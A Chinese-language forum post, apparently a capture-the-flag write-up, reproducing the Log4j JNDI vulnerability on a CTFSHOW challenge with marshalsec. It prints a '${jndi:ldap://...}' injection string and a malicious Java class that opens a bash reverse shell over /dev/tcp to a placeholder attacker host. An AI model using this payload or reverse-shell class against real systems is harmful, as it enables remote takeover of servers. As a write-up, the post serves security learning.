-
-
[原创]CTFSHOWLog4j复现
-
发表于: 2021-12-23 11:59 12937
-
今天上午刚刚看完这个洞,自己复现了一下,晚上就看到了上题正好打一下玩玩
多明显的输入框,嘿嘿嘿
这不得来一个
首先准备好恶意Java类
能弹shell就行,怎么写都行
然后准备好marshalsec-0.0.3-SNAPSHOT-all.jar
注意这里要在恶意Java类的目录下起http服务
这里的端口要和http服务的端口一致!!
喜闻乐见的的地方来了
点击submit
可以看到这里已经加载了恶意类,而我们监听的端口已经反弹到了shell
打完收工!
${jndi:ldap:
/
/
dnslog.com
/
exp} (bushi
${jndi:ldap:
/
/
dnslog.com
/
exp} (bushi
public
class
Test {
static{
try
{
Runtime r
=
Runtime.getRuntime();
String cmd[]
=
{
"/bin/bash"
,
"-c"
,
"exec 5<>/dev/tcp/xxx/50025;cat <&5 | while read line; do $line 2>&5 >&5; done"
};
Process p
=
r.
exec
(cmd);
p.waitFor();
}catch (Exception e){
e.printStackTrace();
}
}
}
public
class
Test {
static{
try
{
赞赏
他的文章
- 牧云·主机管理助手测评 6582
- [原创]JAVA安全—反射 813
- [原创]CISCN2022-东北赛区半决赛eztp解题思路 13033
- [XCTF]第四期个人能力认证考核个人wp 9655
- [原创]记录一次对某CMS漏洞挖掘 1449
看原图
赞赏
雪币:
留言: